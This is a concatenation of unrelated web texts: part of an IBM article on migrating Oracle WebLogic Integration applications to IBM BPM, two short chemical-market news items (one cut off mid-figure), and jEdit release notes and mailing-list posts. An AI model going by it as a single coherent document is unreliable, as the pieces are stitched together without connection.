- Part 3: "Migrating WLI Controls to IBM BPM" shows you how to convert WLI Controls to Service Component Architecture (SCA) components that can be run on IBM BPM.
- Part 4: "Migrating WLI processes (JPDs) to IBM BPM" pulls all of the pieces together by demonstrating the migration of a business process that runs on Oracle WLI to one that runs on IBM BPM.

The issues discussed in this series apply directly to the migration of applications from Oracle WebLogic Integration V8.x, V9.x, and V10.x to IBM BPM Advanced V7.0, V8.0, and V8.5. Most of the information here also applies to earlier versions of WLI.

Artifacts

This section describes the artifacts that make up a WLI application.

- JPD - WLI represents workflows in files with a .jpd extension. A JPD is a Java file, with some extra Javadoc annotations that define the orchestration logic.
- WSDL - WLI uses WSDL to define the interface to the JPD and its partners.
- XQuery - WLI represents XQueries in files with an .xq extension.
- DTF - A Data Transformation File (DTF) is a WLI control that can be invoked by a JPD. DTF files have an extension of .dtf and contain definitions of a data transformation that can be invoked from a JPD. DTF controls generally retrieve some data from an XML document by invoking XQuery (which uses XPath to address specific parts of the XML document).
- JCS - Java Control Source (JCS) files are Java components that developers write to provide business logic and access other controls. These Java controls have an extension of .jcs. They are invoked by JPDs, may have per-process state, and may also access collaborators on behalf of their JPD.
- JCX - Java Control Extension (JCX) files act as wrappers for Java EE resource adapter modules and have an extension of .jcx. They are invoked by JPD callouts.
- XMLBeans - WLI uses XMLBeans to generate Java types from WSDL and XSDs. These Java types are used as parameters to many of the aforementioned WLI artifacts.

Tooling

This section describes the installation and configuration of the migration tools.

BPEL 2.0 Importer

Background

The BPEL 2.0 Importer is an Eclipse plug-in for importing WS-BPEL 2.0 process definitions into IBM Integration Designer V8.0 or V7.5 (or WebSphere® Integration Developer V7.0) so they can be run on IBM BPM. Although IBM BPM supports the majority of WS-BPEL 2.0, some of the language elements in BPM still use the syntax defined in the preliminary BPEL4WS 1.1 specification. The BPEL 2.0 Importer handles these language differences by running a series of XSLT transformations. It even allows you to add new XSLT transformations if required.

Installation

Follow the installation instructions for the BPEL 2.0 Importer described in the developerWorks article Importing WS-BPEL 2.0 process definitions.

BPEL 2.0 Importer – WLI customization

Background

As mentioned, the BPEL 2.0 Importer was designed to import WS-BPEL 2.0 language elements and was extended to handle differences. This extensibility feature is quite useful, because parts of the WLI BPEL are nonstandard. Thus, IBM has created a number of additional XSLT transformations to account for the required changes between WLI BPEL and BPM BPEL. These conversions are syntactic in nature and preserve the runtime semantics. Some of the additional transformations are:

- Convert BPEL v2.0's "if-else/if-else" constructs to v1.1 "switch-case" constructs.
- Convert <empty>, <scope>, and <sequence> nodes under the main "if" element.
- Convert "condition" attributes, nodes, or both.
- Convert XPath or Java snippet conditions.
- Convert <empty> nodes with a <jpd:javacode> child to an <invoke> node.
- Refactor <jpd:javacode> nodes to <wpc:javaCode> nodes.
- WLI's <jpd:javacode> elements wrap Java snippet code in a method block with a method name and curly braces. Those are stripped for BPM Java Snippet constructs.
- Add TODO comments in the Java code to remind developers to review and refactor the Java code to be BPM or WebSphere Process Server compatible.
- Remove incompatible XQuery related nodes.
- Attempt to give a unique name to <scope>, <sequence>, and <assign> nodes.
- Convert variables with initialized values (Integer and String only so far).
- Refactor PartnerLinkType.

Installation

Once the BPEL 2.0 Importer has been installed, you can import BPEL as described in the BPEL plug-in documentation. When BPEL process definitions are imported using the BPEL 2.0 Importer, these process definitions may contain XPath expressions that call XPath functions provided by WLI. If so, the BPEL 2.0 Importer leaves these XPath expressions unchanged. When the processes are in IBM Integration Designer, the calls to these WLI proprietary XPath functions are marked as errors, as these functions are unknown in the IBM BPM environment.

To handle these WLI proprietary XPath expressions, we have implemented about 15 XPath functions that we have found in WLI BPEL processes. These XPath expressions have become the base for a growing repository of XPath function implementations that can be reused for WLI migrations. These XPath function implementations are made known to the IBM BPEL 2.0 Importer by replacing the XSLT file that came with the BPEL 2.0 Importer. The location of that file is:

{IID_Install_Dir}\p2\cic.p2.cache.location\plugins\com.ibm.wbit.bpel20.importer_{Version#+Release_Date}\xslt\ImportBPEL20.xsl

The migration of WLI proprietary XPath expressions will be described in more detail in Part 3 of this series.

OpenESB BPEL 1.1 to 2.0 transform tool

Background

The BPEL 1.1 to 2.0 transform tool is a third-party tool that can be downloaded to migrate your BPEL process from 1.1 to 2.0.
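To make concrete the kind of syntactic gap these tools bridge, here is a hedged sketch of how one branch construct differs between the two dialects (element content is abbreviated and the variable name is invented for illustration). WS-BPEL 2.0 expresses a branch as if/else with a <condition> child element:

```xml
<if>
  <condition>$amount &gt; 1000</condition>
  <sequence name="ManualApproval"><!-- ... --></sequence>
  <else>
    <sequence name="AutoApproval"><!-- ... --></sequence>
  </else>
</if>
```

while BPEL4WS 1.1 expresses the same logic as switch/case with a condition attribute:

```xml
<switch>
  <case condition="bpws:getVariableData('amount') &gt; 1000">
    <sequence name="ManualApproval"><!-- ... --></sequence>
  </case>
  <otherwise>
    <sequence name="AutoApproval"><!-- ... --></sequence>
  </otherwise>
</switch>
```

Because the mapping between the two forms is purely syntactic and preserves the runtime semantics, it is the kind of conversion an XSLT transformation can perform mechanically.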
You may need this tool if you are running earlier versions of WLI that only support BPEL 1.1 exports. This tool can be downloaded from the Open ESB web site.

Installation

The BPEL transformation tool is an executable JAR. Example usage is:

java -jar transform.jar <input folder> <output folder>

Note: <input folder> should contain any referenced BPEL, XSD, or WSDL files.

WLI migration utilities

This section describes the migration utilities available to help you migrate your WLI applications to IBM BPM.

JCS migration utility

The JCS Migration Utility helps migrate JCS (Java Control Source) files to Java objects that can be run on IBM BPM. In WLI, JCSs are essentially Java implementations with a .jcs extension. This utility automatically modifies JCS files and their corresponding interfaces, converting them into standard Java objects that can be used by BPM. The utility migrates JCSs by:

- Changing the extension from .jcs to .java
- Modifying the interface and implementation to remove any proprietary APIs
- Creating an SCA implementation that can be used by BPM

Note: The SCA implementation references some conversion libraries that we developed to handle the data transformations between XMLBeans and Service Data Objects. These libraries are also included in the project classpath.

The utility is an executable JAR that can be run at the command line.
Example usage is:

java -jar transformationUtil.jar JCStoJAVA <location of jcs>.jcs

For example, suppose that <location of jcs> had the files:

- Example.java - Interface file
- ExampleImpl.jcs - Implementation of Example, and business logic

After running the utility you would have:

- Example.java - New interface with proprietary APIs removed
- Example.java.old - Original Java interface for reference (this can be discarded)
- ExampleImpl.java - Implementation of Example.java with proprietary APIs removed and some other changes
- ExampleSCAImpl.java - An SCA implementation that does some data transformation and calls the corresponding methods in ExampleImpl.java. This can be used in BPM
- ExampleImpl.jcs - The unchanged .jcs file (this can be discarded)

DTF Migration Utility

The DTF Migration Utility assists in the migration of WLI DTF (Data Transformation File) files to Java objects that can be run on IBM BPM Advanced. In WLI, DTF files are used to help execute XQuery files for performing data transformations; references to the XQuery files are defined as Javadoc comments above each method in the DTF. The DTF Migration Utility automatically converts DTF files to standard Java objects that can be used by BPM. The utility migrates DTFs by:

- Changing the extension from .dtf to .java
- Removing the abstract modifier from the class declaration
- Changing the abstract methods to standard methods, and modifying the methods to execute the corresponding XQuery file that was defined within the comments
- Removing any WLI proprietary APIs from the class
- Modifying the return type of the methods to return a standard DataObject

The tool is an executable JAR that can be run at the command line. Example usage is:

java -jar transformationUtil.jar DTFtoJAVA <location of dtf>.dtf

XQuery Migration Utility

The XQuery Migration Utility automatically migrates the XQuery files that run on WLI so that they can be executed in BPM.
These XQuery files were written specifically for execution in DTF files, and a few modifications need to be made to make them standard. They are migrated by:

- Adding namespace declarations
- Adding ";" at the end of some lines

The tool is an executable JAR that can be run at the command line. Example usage is:

java -jar transformationUtil.jar XQueryTranformation <location of xquery>.xq

The migration process

This section gives a high-level overview of the major steps performed during the migration from WLI to IBM BPM, as illustrated in Figure 1. These steps will be described in more detail in future parts of this series.

Figure 1. The migration process

Preparation

During the preparation stage, the required software is installed (it is assumed that WLI is already installed), which includes:

- IBM Integration Designer V8.0
- IBM BPM Advanced V8.0
- BPEL 2.0 Importer
- OpenESB BPEL 1.1 to 2.0 Transform Tool (Optional)
- JCS Migration Utility
- DTF Migration Utility
- XQuery Migration Utility

Extract artifacts

In this stage of the migration process, the following artifacts are extracted or exported from the WLI workspace:

- WSDLs and web services (such as JWS)
- Control implementations (such as JCS and JSX)
- Data transformations (such as DTF and XQ)
- XML Schemas (XSD)
- EARs and Java source files

Export BPEL v2.0

If you are using WLI v10.x and have access to JDeveloper, you can export the JPD processes as BPEL v2.0 and avoid having to perform the transformation in the next section. If you are using WLI v7.x, v8.x, or v9.x, you must export the JPD processes as BPEL v1.1, as described in the next section.

Export BPEL v1.1 and transform to BPEL v2.0

If you are using WLI v7.x through v9.x, you don't have the capability to export the JPD processes as BPEL 2.0 and therefore must first export the JPD processes as BPEL v1.1 by doing the following:

- Use the Export BPEL option in WLI Workshop to export the JPD process as BPEL.
- Copy the BPEL, WSDL, and XSD files into a temporary directory.
- Use the OpenESB BPEL 1.1 to 2.0 Transform Tool to convert the BPEL to BPEL v2.0.

Import artifacts into Integration Designer

The next stage of the migration process is to import the WLI artifacts into IBM Integration Designer using the BPEL 2.0 Import wizard in the Import dialog.

Migrate XMLBean objects

XMLBeans (based on Apache XMLBeans) is the default XML data construct and access technology leveraged by WLI processes. Many existing WLI artifacts, WLI controls, Java snippets, and Java utilities contain XMLBean objects. Given that some of the aforementioned artifacts have XMLBeans deeply embedded and would be too costly to re-code, you can follow these steps to bridge between XMLBeans and SDO:

- Generate XMLBeans Java objects from existing XSD schemas using the Apache XMLBeans libraries.
- Import the generated XMLBeans into the Integration Designer workspace.
- Locate existing code where XMLBeans are used.
- Use the WLI migration utilities to convert between XMLBeans and SDO. (This is a two-step conversion process: XMLBeans ↔ XML String ↔ SDO.)

This process will be described in more detail in Part 2 of this series.

Migrate the WSDL

Two WSDL files are generated for each exported WLI JPD BPEL flow:

- One provider WSDL defines the interface for the JPD process.
- One control WSDL defines the interface for all the external services the JPD process invokes. This WSDL has the "_ctrl" suffix in the file name.

After the WSDL files are imported into Integration Designer, a number of changes may be required:

- schemaLocation attributes sometimes need correction.
- Some types will have to be modified (for example, Exceptions, Objects, xsd:base64binary).
- The provider WSDL may have a missing types definition. This can be imported from XSD or copied from the control WSDL.
- Some interfaces in the control WSDL files may be replaced by the original WSDL files or other exported WSDL files (e.g. web service controls, process controls, and so on).
- PartnerLink information may need to be updated.

This process will be described in more detail in Parts 3 and 4 of this series.

Migrate XQuery transforms

WLI uses the XQuery language to transform XML messages. Such XQuery transformations are commonly used in WLI JPD processes. Each XQuery is saved in a .XQ file and is invoked using a WLI control (saved in a .DTF file). IBM BPM does not natively support XQuery transformations (it supports transformations using XSLT or Java), and although manually converting the XQuery to XSLT or Java is an option, in some cases it might be easier to use the existing XQuery transformations by invoking the WebSphere Thin Client for XML, which supports XQuery 1.0. To use the XQueries with the WebSphere Thin Client for XML, do the following:

- Run the WLI Migration Utilities to transform the .DTF files to Java code that leverages the Thin Client for XML.
- Run the WLI Migration Utilities to transform the .XQ files to be compatible with the thin client.
- Create a Java SCA component using the converted .DTF Java implementation.

This process will be described in more detail in Part 2 of this series.

Migrate Custom Controls

WLI Custom Controls are externalized Java classes exposed as WLI controls, which are invoked by WLI JPD processes. These Custom Controls often implement complex functionality that is not provided natively by WLI or IBM BPM and may have a large code base that is impractical to re-implement during migration. Complete the following steps to migrate a Custom Control to IBM BPM while preserving as much of the custom code as possible:

- Run the WLI Migration Utilities to transform Custom Control .JCS files to POJOs.
- Create a Java SCA component using the converted .JCS Java implementation.
- Perform any manual modifications necessary to correctly convert data types in the converted .DTF Java code.

This process will be described in more detail in Part 3 of this series.
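To make the Custom Control step above concrete, here is a minimal sketch of the kind of mechanical rewrite the JCS-to-POJO conversion performs (rename the file, drop proprietary imports, leave a review marker). Everything here is assumed for illustration: the `com.bea` package filter, the TODO wording, and the idea that a simple line filter suffices; the real utility also rewrites the interface and emits the SCA wrapper described earlier.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class JcsToPojo {

    // Convert one .jcs file to a .java file next to it, stripping lines that
    // reference assumed WLI-proprietary packages (com.bea.*).
    public static Path convert(Path jcsFile) throws IOException {
        List<String> out = new ArrayList<>();
        for (String line : Files.readAllLines(jcsFile)) {
            if (line.trim().startsWith("import com.bea.")) {
                // Drop the proprietary import and leave a review marker.
                out.add("// TODO: review; a WLI proprietary import was removed here");
            } else {
                out.add(line);
            }
        }
        String newName = jcsFile.getFileName().toString()
                .replaceAll("\\.jcs$", ".java");
        Path javaFile = jcsFile.resolveSibling(newName);
        Files.write(javaFile, out);
        return javaFile;
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("jcs-demo");
        Path jcs = dir.resolve("ExampleImpl.jcs");
        Files.write(jcs, Arrays.asList(
                "import com.bea.control.JwsContext;",
                "public class ExampleImpl {",
                "}"));
        for (String line : Files.readAllLines(convert(jcs))) {
            System.out.println(line);
        }
    }
}
```

The deliberately visible TODO marker matches the utilities' general strategy noted earlier: automate the syntactic rewrite, but force a developer to review each spot where proprietary API usage was removed.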
Migrate Built-in Controls

WLI built-in controls are pre-built integration components that allow the WLI JPD process to interact with external enterprise systems. These built-in controls are exposed through a Java Control Extension (.JCX) file that contains the interface and configuration data for the built-in control. Some built-in controls can be replaced by embedded IBM BPM business process features (such as Process Control with Invoke, Timer Control with Expiry or Wait, and so on), some can be replaced by WebSphere Adapters, and some simply require re-implementation. This process will be described in more detail in Part 3 of this series.

Migrate the business processes

This step of the migration process is focused on making the required changes to the BPEL process that was exported from WLI to ensure that it is ready to run on IBM BPM. Some of the required changes are:

- Conversion of fault handlers
- Conversion of parallel "or" constructs
- Setting transaction properties
- Conversion of Java snippets
- Modification of partner references

This process will be described in more detail in Part 4 of this series.

Assemble and wire the components

Once the BPEL process and other implementation artifacts have been migrated to IBM BPM, you need to complete the assembly diagram by creating SCA components and wiring them to the BPEL process. Before the application can be deployed, you must create any required J2EE resources on the IBM BPM server and disable the inter-transaction cache. This process will be described in more detail in Part 4 of this series.

Deploy and test

The final stage of the migration process is to deploy and test the new IBM BPM process using the integration test client in Integration Designer. If there are any unimplemented components or unwired references in the process, they are automatically emulated. This means your process does not need to be complete before you can start testing.
This process will be described in more detail in Part 4 of this series.

Conclusion

The tools and migration process described in this series of articles were developed over the past year to ease the process of migrating Oracle WLI applications to IBM BPM Advanced. These tools have been used successfully at customer sites. To obtain these tools, contact the authors or your IBM sales representative.

Resources

- Importing WS-BPEL 2.0 process definitions: Using the WS-BPEL 2.0 standard with IBM Integration Designer
- Oracle WebLogic Integration BPEL Import and Export User Guide, 10g Release 3 (10.3.1)
- Oracle Lifetime Support Policy - Oracle Fusion Middleware
- IBM Business Process Manager Advanced product information
- IBM Business Process Manager Information Center
- IBM Software Services for WebSphere
http://www.ibm.com/developerworks/bpm/library/techarticles/1306_vines/1306_vines.html
20 January 2012 03:33 [Source: ICIS news] SINGAPORE (ICIS)--Saudi Aramco Mobil Refinery (Samref) has sold by tender 230,000 barrels of naphtha for loading from Yanbu. The loading dates are 5-7 March, they added. The cargo was done at a premium of around $20-22/tonne (€15-17/tonne). ($1 = €0
http://www.icis.com/Articles/2012/01/20/9525519/saudis-samref-sells-230000-barrels-naphtha-for-early.html
24 February 2012 15:59 [Source: ICIS news] LONDON (ICIS)--Bullish sentiment in the European acrylonitrile (ACN) market continues to take hold on the back of concerns over raw material shortages and strong development. February business is done and European manufacturers insist they will not sell below $2,100/tonne (€1,575/tonne) CIF (cost, insurance, freight) WE (western Europe) for March, up from $1,700–1,800/tonne at the start of the year. One buyer said that it is still getting offers in the $2,000s/tonne for March shipment but others concede that values will be above $2,100/tonne CIF WE. Indeed, rumours were heard of a deal. European manufacturers are looking to catch up with the prices being seen in other regions. Northeast Asian figures are heard at around $2,150–2,200/tonne CFR, amid a spate of plant shutdowns. In addition, Ineos has had to scale back ACN production at its 300,000 tonne/year plant in Cologne because of problems with upstream propylene availability. The Switzerland-headquartered petrochemical firm declared force majeure on propylene supplies from the German site after a leak on the superheater forced the No.4 cracker to shut down at the end of last week. Initial indications suggest it is likely to be off line for around 21 days. Ineos is therefore trying to supplement the propylene shortfall on the spot market, and in the meantime has been forced to limit ACN production, a company source said. European spot ACN prices are now pegged at $2,080–2,110/tonne CIF WE. ($1 = €0.75)
http://www.icis.com/Articles/2012/02/24/9535837/europe-acn-prices-continue-ascent-on-feedstock.html
Hello everybody, I am leaving New Zealand on the 29th June. I will be in Australia until the 20th July. During this time I will have e-mail access, however I will not be doing any jEdit development. On the 21st July, I am going to Canada. Once I settle in, I will resume jEdit development. Before I leave I will release a new version of the FTP plugin, and maybe a new version of the XML plugin as well. -- Slava Pestov

jEdit 4.1pre2 is now available from <>. Thanks to Alexander Maryanovsky and Gerd Knops for contributing to this release.

+ Editing Changes:
- The 'Smart Home/End' setting has been split into two separate settings, one for Home and one for End.
- Made behavior of mouse in gutter more customizable. (Gerd Knops)
- Added option to make double-click drag treat each non-alphanumeric character as one word. (Gerd Knops)
- Added an option to not hide the final end of line character of a buffer.

+ Syntax Highlighting Changes:
- Syntax rules can now specify the AT_WHITESPACE_END attribute. If this is set to TRUE, then the rule will only match if it is the first non-whitespace text in the line.
- Fixed minor highlighting problem with properties mode.

+ File System Browser Changes:
- Multiple files can now be selected in the stand-alone browser; right-clicking no longer deselects all but the clicked file.
- Added 'Open in New Split' command to the right-click menu that splits the view and opens the selected file in the newly created text area.
- Right-click menus in the 'Open File' dialog box now contain menu items for opening files in new views and new splits.
- File->Open With Encoding menu replaced with an 'Encoding' menu in the file system browser's 'Commands' menu.

+ Scripting Changes:
- 'scriptPath' BeanShell variable is set to the macro file path while a macro or startup script is executing.
- Startup scripts can now be written in any language supported by a registered macro handler; so you can put Python scripts in the 'startup' directory if you have the JythonInterpreter plugin installed, for example.
- Slight performance improvement when invoking editor actions.

+ Miscellaneous Changes:
- The HyperSearch feature no longer blocks the GUI while listing a directory (which could take some time).
- New 'broken image' icon shown in place of tool bar buttons whose icons cannot be located.
- Improved popup menu positioning code.
- jEdit.get{Integer,Double}Property and Buffer.getIntegerProperty() no longer barf if the property contains leading or trailing whitespace.
- Added View->New Plain View command that opens a new view without toolbars or dockables. This can be useful for opening up a quick window for taking notes, etc.
- File system browser color regexps are now case-insensitive.
- Each dockable window now has a <name>-float action that opens a new instance of that dockable in a new floating window (regardless of the docking status of the window). These commands do not appear in the menu bar, however they can be added to the context menu and tool bar, or bound to keystrokes.

+ Bug Fixes:
- Fixed default install path settings in installer when running on Unix. Now, instead of checking for a user name of "root", it checks if the appropriate subdirectories of /usr/local are writable.
- When evaluating BeanShell expressions, the standard view/buffer/editPane/textArea variables would not be unset when the expression finishes executing.
- The text area did not get initial focus if there is a window docked in the left or top part of the view, and the 'tip of the day' was switched on.
- Removed debugging messages from PanelWindowContainer.java.
- Fixed bottom tool bar layout problem.
- Image shown in 'welcome to jEdit' page in help was not being installed by the installer.
- Fixed a bug in the folding code that could be triggered by switching to indent fold mode, collapsing some folds, switching to explicit fold mode, then switching back to indent fold mode again.
- The view's minimum size was rather large, which caused problems while trying to resize it if the option to decorate window borders using the Swing L&F was enabled.
- 'Expand Fold Fully' command didn't work.
- The 'gutter bracket highlight' setting in the Color option pane didn't work.
- Fixed possible ClassCastException if a 'paste previous' string started with the text "<html>". Swing has a weird feature where any text label beginning with <html> is rendered using the Swing HTML engine, and this would trip it off.
- HyperSearch inside a selection did not handle ^ and $ in regular expressions correctly on the first or last line of the selection.
- Insertion of { and } in C-like modes can now be undone in one step.
- Another indentPrevLine regexp fix. (Alexander Maryanovsky)

+ API Changes:
- It is no longer necessary to define labels for dockable window <name>-toggle actions. The label is now automatically created by appending "(Toggle)" to the non-toggle action's label.
- Old-style dockable window API no longer supported; the following symbols have been removed: EditBus.addToNamedList() method, EditBus.removeFromNamedList() method, EditBus.getNamedLists() method, CreateDockableWindow class, DockableWindow interface

-- Slava Pestov

jEdit 4.1pre1 is now available from <>. This is the first "real" release since 4.0final -- lots of new features here. Please tell me what you think of them. Thanks to Alexander Maryanovsky, Alfonso Garcia, Claude Eisenhut, Joseph Schroer, Kris Kopicki, Steve Snider and Thomas Dilts for contributing to this release.

+ Editing Changes:
- Improved rectangular selection. It now does the right thing with hard tabs, and the width of the selection is no longer limited to the width of the last line.
A new 'Vertical Paste' command has been added (it behaves in a similar manner to the 'Virtual Paste' macro, which has now been removed). When inserting text into a rectangle, the inserted text is left-justified with spaces. The quick copy feature has been extended to support this -- a Control-middle click vertically pastes the most recently selected text.
- Fixed auto-indent behavior when entering constructs like: if(foo) bar(); baz(); in Java/C/C++/etc modes. Previously the 'baz();' would get an unnecessary level of indent, requiring it to be removed manually. (Alexander Maryanovsky)
- Added an option to the 'Text Area' pane to implement "standard" previous/next word behavior, like that in a lot of other programs (next word moves caret to start of next word, instead of end of current word; previous word moves caret to end of previous word, instead of start of current word). You might remember I implemented this behavior for a little while in the 4.0 pre-releases, but now it's back as a configurable option. (Alexander Maryanovsky)
- Added a few extra key bindings for Windows users: S+DELETE bound to cut, C+INSERT bound to copy, S+INSERT bound to paste
- Optimized several parts of the buffer code; this should make 'Replace All' and similar edit-intensive tasks much faster.

+ Search and Replace Changes:
- HyperSearch now respects rectangular selections. 'Replace All' already supported rectangular selections.
- Directory search is now VFS-aware; however it shows a confirm dialog before doing a search on a remote filesystem. If your VFS is not affected by network latency, you can have the getCapabilities() method return the new LOW_LATENCY_CAP capability.
- Tool bars no longer take up the full width of the view. This saves some screen space.
- Clicking 'Cancel' or closing the search and replace dialog box no longer shows warnings about empty filesets, etc.

+ Syntax Highlighting Changes:
- More intelligent highlighting of numbers.
Instead of a hard-coded heuristic that only worked for C-like languages, numbers are now highlighted as follows:
- A keyword consisting of only digits is automatically marked with the DIGIT token type.
- If it has a mix of digits and letters, it is marked as DIGIT if it matches the regexp specified in the rule set's DIGIT_RE attribute. If this attribute is not set, then mixed sequences of digits and letters are not highlighted.
- In Java mode, for example, the default value of this regexp is "(0x[[:xdigit:]]+|[[:digit:]]+)[lLdDfF]?".
- EOL_SPAN elements can now have DELEGATE attributes.
- SEQ elements can now have DELEGATE attributes. If specified, this rule set will be swapped in after the text matched by the sequence rule.
- Delegates to rulesets with TERMINATE rules should work now.
- IGNORE_CASE attribute of KEYWORDS rule removed. This value is now the same as the IGNORE_CASE attribute of the parent RULES tag.
- WHITESPACE rule no longer necessary in mode definitions.
- It is no longer necessary to define <SEQ TYPE="NULL"> rules for keyword separator characters. Now, any non-alphanumeric character that does not appear in a keyword string or the "noWordSep" buffer-local property is automatically treated like it had a sequence rule.
- Added FORTRAN syntax highlighting (Joseph Schroer)
- Added Interilis syntax highlighting (Claude Eisenhut)
- Updated PL-SQL mode (Steve Snider)
- Updated NetRexx mode (Patric Bechtel)
- HTML and related edit modes now correctly highlight sequences like: <SCRIPT LANGUAGE="JavaScript">...</SCRIPT> and <SCRIPT ... whatever ...>...</SCRIPT> Previously only JavaScript between <SCRIPT> and </SCRIPT> was highlighted. A similar change has been made for <STYLE> tags.
- Improved loading time of plain text files if 'more accurate syntax highlighting' is on.

+ User Interface Changes:
- Status bar looks somewhat different now, and shows the word wrap mode and line separator status.
- The search bar commands now show the search bar if it is hidden.
Search bars that come into existence as a result of this have an extra close box button on the right. Pressing ESCAPE in the text field or clicking the button hides the search bar. I have renamed the search bar setting in the General option pane to "Always show search bar", and made it be switched off by default. You can revert to the old behavior simply by switching this setting back on. - The text color and style used to show the "[n lines]" string can now be set independently of the EOL marker color. - Plugin manager window can be closed by pressing Escape. - Open buffers are shown with a different icon in the file system browser. - 'I/O Progress Monitor' window is dockable now. - Added two new sub-menus to the Utilities menu, 'jEdit Home Directory' and 'Settings Directory'. These two work in a similar fashion to the 'Current Directory' menu. Also the 'Current Directory' menu (and these two new menus) now also lists directories; selecting a directory menu item opens it in the file system browser. - Moved BeanShell evaluation commands from 'Utilities' to 'Macros' menu, rearranged 'Edit' menu. - New splash screen, about box, and tool bar icons. (Kris Kopicki) - Added ColorWellButton control. Under Mac OS X, changing the background color of a JButton doesn't work if the MacOS Adaptive look and feel is in use... so I wrote a custom control. It looks better and eliminates duplicated code anyway. Plugin developers, please use this instead of the widely-copied and pasted JButton trick. (Kris Kopicki) - Added RolloverButton control. Use this instead of the JToolBar "isRollover" client property (which only works in the Metal L&F unless you're running Java 2 version 1.4). (Kris Kopicki) + OS-specific Changes: - MacOS plugin version 1.2.1 adds an option pane with a few settings, and some bug fixes and cleanups. (Kris Kopicki) - When running on MacOS, the roots: filesystem now lists all disks mounted under /Volumes. 
(Kris Kopicki)
- On Unix, the installer now defaults to installing in the user's home directory when running as a non-root user.

+ Miscellaneous Changes:
- WheelMouse plugin integrated into core -- no need to install a separate plugin to get wheel mouse scrolling under Java 2 version 1.4.
- Added SOCKS proxy support. This option will help people trapped behind a Microsoft Proxy Server configured to use NTLM authentication. Normal HTTP connections through the proxy would not be possible since Java does not implement this proprietary protocol; however a little known fact is that MS Proxy Server also usually runs a SOCKS service that does not require a password. (Alfonso Garcia)
- BeanShell 1.2b6 included. Changes since 1.2b5 are: exposed bsh.BshMethod and added a public invoke() method; added getMethods() method to namespace to enumerate methods. The fact that BshMethod is now public has facilitated optimizations which improve performance of BeanShell search and replace.
- Updated printing code (Thomas Dilts): uses Java 2 version 1.4 print dialogs when running on that Java version; performs printing in a background thread.
- Documentation is now generated using DocBook-XSL 1.51.1 stylesheets.

+ Bug Fixes:
- Select Open File; press Enter first; then choose a file to open. Bang, an error message. Now fixed.
- When closing a file with unsaved changes, the file will now stay open if the save failed. Previously it would be closed and the unsaved changes would be lost forever.
- If 'Keep Dialog' was off, the search dialog would close, even after an unsuccessful HyperSearch. This was inconsistent with the behavior for normal searches, where an unsuccessful match did not close the dialog (so you could correct the search string more easily).
- The 'initially collapse folds with level' setting was not being honored when reloading files.
- A few printing bugs fixed. (Thomas Dilts)
- Workaround for views not being brought to front on windows.
This workaround minimises and then restores the view, so a minimise animation might be visible for a brief period of time. However, there is no other way of fixing this. (Alexander Maryanovsky) - Dynamic menus (Recent Files, etc) did not work under MacOS X if the menu bar was at the top of the screen. Note that this does not solve the other problem with having the menu bar there, namely keyboard shortcuts not being displayed. For now, leave the menu bar inside the frame for best results. (Kris Kopicki) - Fixed silly windows backup saving bug. - Fixed minor problem when Control-clicking characters in the text. - Middle mouse button drags now work if there is an existing selection. + API Changes: - Two methods added to jEdit class: getDoubleProperty() setDoubleProperty() - Removed unused TextUtilities.findMatchingBracket(Buffer buffer, int line, int offset, int startLine, int endLine) method. - New ViewUpdate.EDIT_PANE_CHANGED message added; it is sent when a different edit pane in a split view receives focus. - EBMessage.veto(), isVetoable() methods and EBMessage.NonVetoable class deprecated. - Removed old text area highlighter API, old buffer folding API. - Removed BufferUpdate.ENCODING_CHANGED, FOLD_HANDLER_CHANGED messages; replaced with generic BufferUpdate.PROPERTIES_CHANGED. - MultiSelectStatusChanged message removed. - Buffer.markTokens(int lineIndex) deprecated; use Buffer.markTokens(int lineIndex, TokenHandler tokenHandler) instead, with one of the available TokenHandler implementations from org.gjt.sp.jedit.syntax. The tokenizer now behaves differently with respect to whitespace. Tab characters are always put into separate tokens with type Token.TAB; other whitespace gets token type Token.WHITESPACE. - Added new jEdit.getActiveView() method. - VFS file chooser now supports a new 'CHOOSE_DIRECTORY_DIALOG' mode. - Buffer.getRuleSetAtOffset() method is now public. -- Slava Pestov jEdit 4.0.3 is now available from <>. 
This fixes a showstopper bug in jEdit 4.0.2. Everyone should upgrade. Note that I have now made unified diffs from 4.0 to 4.0.2 and from 4.0.2 to 4.0.3 available.

* Version 4.0.3

+ Bug Fixes
- Added missing check for control key being down in text area mouse handler.

+ API Changes
- Buffer.getRuleSetAtOffset() method is now public.

Hello jEdit users- This evening, I have added the latest batch of new plugin releases to Plugin Central. The batch includes one new addition (CheckStylePlugin 0.1 by Todd Papaioannou) and six updates to plugins already on Plugin Central.

* CheckStylePlugin 0.1: initial Plugin Central release; CheckStylePlugin is a wrapper around the CheckStyle program that allows you to check your code for adherence to, or deviation from, a coding standard; requires jEdit 4.0, ErrorList 1.2, and JDK 1.3; includes CheckStyle 2.2 and ANTLR (checkstyle-all-2.2.jar)
* JavaRefactor 0.0.3: added the ExtractMethod refactoring; updated for jEdit 4.0; requires jEdit 4.0pre1 and JDK 1.3; includes RECODER
* JSwatPlugin 1.2.0: updated for JSwat 2.4 and JPDA; requires jEdit 4.0pre7, CommonControls 0.2, and JDK 1.4; includes JSwat 2.4
* Lazy8Ledger 1.31: change from 2 digit to 3 digit version number; numerous serious bugs fixed that showed up if you used Java 1.3 instead of Java 1.4 (these bugs prevented the use of Lazy8Ledger almost entirely); after creating a new company and adding default accounts, the name of the company was wrong (fixed); if you used Java 1.3 instead of Java 1.4 then the database backup that should happen when you exit Lazy8Ledger didn't work (fixed); requires jEdit 4.0pre8, BufferTabs 0.7.6, InfoViewer 1.1, and JDK 1.4
* MementoPlugin 0.5.1: fixed layout problems; requires jEdit 4.0final and JDK 1.4
* NetRexxJe 0.07: added source code navigator; removed toolbar; switched to standard icons; other GUI changes; classpaths stored in jEdit history file instead of property file; requires jEdit 4.0final and JDK 1.3
* TaskList 0.4.0: added ability to specify
which modes to parse tasks for; option to 'single-click' select tasks in TaskList; added a couple new task types (XXX and FIXME:); bug fixes (case-insensitive task types didn't work, new task names weren't saved); added some validation when adding/editing new task types; new icons; updated to work with jEdit 4.1 in CVS (Token parsing changes); now requires jEdit 4.1 to compile; requires jEdit 4.0pre5 and JDK 1.3

This will be the last update for a couple weeks at least, as I am currently surrounded by boxes and am moving in two days. Have fun. -md

jEdit 4.0.2 is now available from <>. This is a bug fix release; everyone using 4.0 should upgrade as soon as possible. Note that jEdit 4.0.1 was never released.

+ Enhancements
- Documentation is now generated with DocBook-XSL 1.51.1 stylesheets.

